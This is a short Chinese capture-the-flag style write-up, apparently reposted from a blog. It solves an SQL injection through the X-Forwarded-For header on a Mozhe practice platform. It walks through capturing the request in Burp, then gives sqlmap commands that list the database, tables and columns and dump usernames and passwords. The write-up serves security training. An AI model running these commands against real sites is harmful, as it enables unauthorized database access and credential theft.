X-forwarded-for注入漏洞实战
Posted gusi
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了X-forwarded-for注入漏洞实战相关的知识,希望对你有一定的参考价值。
1、掌握SQL注入的基本原理;
2、了解服务器获取客户端IP的方式;
3、了解SQL注入的工具使用;
随便输入用户名密码登录,提示有ip信息,根据题目的意思是信息是根据x-forwarded-for的纸变得,所以本题存在x-forwarded-for注入
1.首先打开burp抓包,添加x-forwarded-for:*,将raw的信息存为txt文件,如下图所示,速度比较慢,请耐心等待
2:#sqlmap -r 1.txt --current-db --batch //爆出数据库
3:#sqlmap -r 1.txt -Dwebcalendar --tables //爆出表
4:#sqlmap -r 1.txt -D webcalendar -T user --columns //爆出列
5:#sqlmap -r 1.txt -D webcalendar -T user -C username,password --dump //爆出数据库用户名和密码
这是墨者平台的一道注入题
以上是关于X-forwarded-for注入漏洞实战的主要内容,如果未能解决你的问题,请参考以下文章
安全测试 web安全测试 常规安全漏洞 可能存在SQL和JS注入漏洞场景分析。为什么自己没有找到漏洞,哪么可能存在漏洞场景是?SQL注入漏洞修复 JS注入漏洞修复 漏洞存在场景分析和修复示例(代码片段